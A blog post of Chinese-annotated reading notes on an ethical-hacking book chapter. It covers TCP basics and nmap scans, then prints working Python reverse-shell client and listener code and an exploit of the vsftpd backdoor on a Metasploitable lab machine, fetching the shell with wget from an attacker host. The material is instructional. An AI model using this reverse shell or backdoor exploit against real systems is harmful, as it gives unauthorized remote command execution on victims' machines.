Ethical.Hacking.2021.10:CRAFTING TCP SHELLS AND BOTNETS(1)

于 2021-12-09 17:55:58 发布
阅读量1.3k 收藏
点赞数
分类专栏: 读原著笔记 文章标签: tcp/ip 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/121836450
版权
本文介绍了文件如何通过TCP分包进行传输,包括序列号的使用确保正确重组。讨论了防火墙和NAT如何阻止外部连接但允许内部发起连接,并探讨了反向Shell的概念及其利用方式,以及如何通过扫描和利用脆弱服务进行攻击。同时,展示了创建反向Shell客户端和服务端的Python代码示例。
摘要由CSDN通过智能技术生成

How a file is converted into packets with sequence numbers

Before a file can be transmitted, it must be encapsulated into a packet. However, TCP packets have a maximum size of 64KB, so files larger than this are divided and placed into several TCP packets.

Each packet is assigned a sequence number so that the file can be reassembled.
Sequence numbers are consecutive, which allows the recipient to determine the proper order in which to interpret the packets

however, each machine starts the sequence with a random number to keep hackers from predicting the sequence.
Before two machines can transmit their packets, they must both receive and acknowledge the other machine’s starting sequence number so that they can keep track of any lost packets. This
exchange is a called the TCP three-way handshake.

When the systems have finished exchanging packets, they close the connection by exchanging FIN and ACK packets.

firewalls prevent machines outside the network from initiating connections to servers
inside the network.

However, many firewalls allow the reverse: machines inside the network can still initiate connections to machines outside the network.

How firewalls and NAT block incoming connection, but not outgoing ones

防火墙和NAT如何阻止传入连接而不是传出连接

A reverse shell consists of two parts: a component that connects
to the attacker’s computer, and a shell component that allows an
attacker to execute terminal commands on the victim’s machine.

maps port numbers to their associated services:https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml

Scanning for Open Ports

nmap -s V 192.168.1.101

nmap  performs a SYN scan by default. Instead of establishing a full connection, a SYN scan sends TCP SYN packets, listens for SYNACK responses and marks a port as open if it receives a response.

the -sS  flag represents the SYN scan

nmap -sS <Metasploitable IP address>

use TCP-FIN packets to bypass firewall protections.

nmap -sF <Metasploitable IP address>

An XMas scan sets the FIN, PSH, and URG flags
in the TCP packet. The PSH and URG flags are rarely used, and
systems often contain incomplete or incorrect implementations of the
TCP/IP standard that don’t handle them uniformly. By examining how
a system responds to these flags, an attacker can infer information
about the TCP/IP implementation and learn about the system

nmap -sX <Metasploitable IP address>

Exploiting a Vulnerable Service

National Vulnerability Database at https://nvd.nist.gov/.

In these cases, an attacker will need to discover an unknown vulnerability. These are called zero-day vulnerabilities because the victim is unaware of them and so has zero days to fix them.

python -m http.server 8000

# 注:在 Python2 中是这样
python -m SimpleHTTPServer 8000

Writing a Reverse Shell Client

reverse Shell.py

import sys
from subprocess import Popen, PIPE
from socket import *
➊
server Name = sys.argv[1]
server Port = 8000
   #Create IPv4(AF_INET), TCPSocket(Sock_Stream)
➋
client Socket = socket(AF_INET, SOCK_STREAM)
➌
client Socket.connect((server Name, server Port))
client Socket.send('Bot reporting for duty'.encode()) 
➍
 
command = client Socket.recv(4064).decode() 
➎
 
while command != "exit":
     
➏
 proc = Popen(command.split(" "), stdout=PIPE, stderr=PIPE)
     
➐
 result, err = proc.communicate()
 client Socket.send(result)
 command = (client Socket.recv(4064)).decode()

client Socket.close()

The Popen  method ➏  creates a copy, or fork, of the current process, called a subprocess

Writing a TCP Server That Listens for Client Connections

shell Server.py

from socket import *
 server Port = 8000
➊
 server Socket = socket(AF_INET, SOCK_STREAM)
➋
 server Socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
➌
 server Socket.bind(('' , server Port))
➍
 server Socket.listen(1)
 print("Attacker box listening and awaiting instructions")
➎
 connection Socket, addr = server Socket.accept()
 print("Thanks for connecting to me "
             +str(addr))
 message = connection Socket.recv(1024)
 print(message)
 command =""
   while command != "exit":
       command = input("Please enter a command: ")
       connection Socket.send(command.encode())
       message = connection Socket.recv(1024).decode()
       print(message)
➏
 connection Socket.shutdown(SHUT_RDWR)
 connection Socket.close()

Start the server:

python3 ~/Desktop/shell/shell Server.py

Loading the Reverse Shell onto the Metasploitable Server

 python3 -m http.server 8080

nc <Metasploitable IP address> 21
user Hacker:)
pass invalid

nc <Metasploitable IP address> 6200

mkdir shell
cd shell
wget <Kali IP>:8080/reverse Shell.py

Start the reverse shell on the Metasploitable machine

python reverseShell.py <Kali IP address> &

Switch over to the Kali Linux machine and try executing  command:

花纵酒
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值